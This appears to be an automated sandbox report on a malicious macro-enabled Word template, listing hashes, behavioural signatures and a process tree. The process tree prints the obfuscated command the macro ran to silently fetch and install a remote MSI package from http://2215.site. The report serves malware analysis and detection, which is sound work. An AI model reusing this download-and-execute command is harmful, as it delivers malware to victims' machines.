Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240319-en -
resource tags
arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system -
submitted
10/04/2024, 10:16
Behavioral task
behavioral1
Sample
33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm
Resource
win10v2004-20240319-en
General
-
Target
33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm
-
Size
67KB
-
MD5
549334edbfacd98b6c5c3154949d5b12
-
SHA1
a17eef04cf987d16ab2f7c23f97885e6e428f500
-
SHA256
33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548
-
SHA512
eac1d31ec581fa694c38ecd0109e2b5ff3510bd26e45b2939b4cdb3f1d75e3b74516b4004db9a774df4739c4476262f4db92ba76768cb46fa2e8da32ffe537db
-
SSDEEP
1536:ruTk2YSjvnD9AxoD+u9yqYjc5zZP80/qv13oteePEl+p0X+p7RFVBaIA:K9KxQH9T5FLiv13ZAnp3GIA
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3564 4928 cmd.exe 88 -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 6020 msiexec.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 135 6056 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI640F.tmp msiexec.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1356 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4928 WINWORD.EXE 4928 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 6020 msiexec.exe Token: SeIncreaseQuotaPrivilege 6020 msiexec.exe Token: SeSecurityPrivilege 6056 msiexec.exe Token: SeCreateTokenPrivilege 6020 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 6020 msiexec.exe Token: SeLockMemoryPrivilege 6020 msiexec.exe Token: SeIncreaseQuotaPrivilege 6020 msiexec.exe Token: SeMachineAccountPrivilege 6020 msiexec.exe Token: SeTcbPrivilege 6020 msiexec.exe Token: SeSecurityPrivilege 6020 msiexec.exe Token: SeTakeOwnershipPrivilege 6020 msiexec.exe Token: SeLoadDriverPrivilege 6020 msiexec.exe Token: SeSystemProfilePrivilege 6020 msiexec.exe Token: SeSystemtimePrivilege 6020 msiexec.exe Token: SeProfSingleProcessPrivilege 6020 msiexec.exe Token: SeIncBasePriorityPrivilege 6020 msiexec.exe Token: SeCreatePagefilePrivilege 6020 msiexec.exe Token: SeCreatePermanentPrivilege 6020 msiexec.exe Token: SeBackupPrivilege 6020 msiexec.exe Token: SeRestorePrivilege 6020 msiexec.exe Token: SeShutdownPrivilege 6020 msiexec.exe Token: SeDebugPrivilege 6020 msiexec.exe Token: SeAuditPrivilege 6020 msiexec.exe Token: SeSystemEnvironmentPrivilege 6020 msiexec.exe Token: SeChangeNotifyPrivilege 6020 msiexec.exe Token: SeRemoteShutdownPrivilege 6020 msiexec.exe Token: SeUndockPrivilege 6020 msiexec.exe Token: SeSyncAgentPrivilege 6020 msiexec.exe Token: SeEnableDelegationPrivilege 6020 msiexec.exe Token: SeManageVolumePrivilege 6020 msiexec.exe Token: SeImpersonatePrivilege 6020 msiexec.exe Token: SeCreateGlobalPrivilege 6020 msiexec.exe Token: SeRestorePrivilege 6056 msiexec.exe Token: SeTakeOwnershipPrivilege 6056 msiexec.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4928 wrote to memory of 3564 4928 WINWORD.EXE 103 PID 4928 wrote to memory of 3564 4928 WINWORD.EXE 103 PID 3564 wrote to memory of 1356 3564 cmd.exe 105 PID 3564 wrote to memory of 1356 3564 cmd.exe 105 PID 3564 wrote to memory of 6020 3564 cmd.exe 114 PID 3564 wrote to memory of 6020 3564 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548.dotm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C P^i^Ng 127.0.0.1 -n 66 > NUL && M^S^Ie^x^e^c /i http://2215.site/cdt4821.msi /qn2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\system32\PING.EXEPiNg 127.0.0.1 -n 663⤵
- Runs ping.exe
PID:1356
-
-
C:\Windows\system32\msiexec.exeMSIexec /i http://2215.site/cdt4821.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:6020
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4956 --field-trial-handle=3408,i,16599691418790971742,134777455365707676,262144 --variations-seed-version /prefetch:81⤵PID:3732
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:6056
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84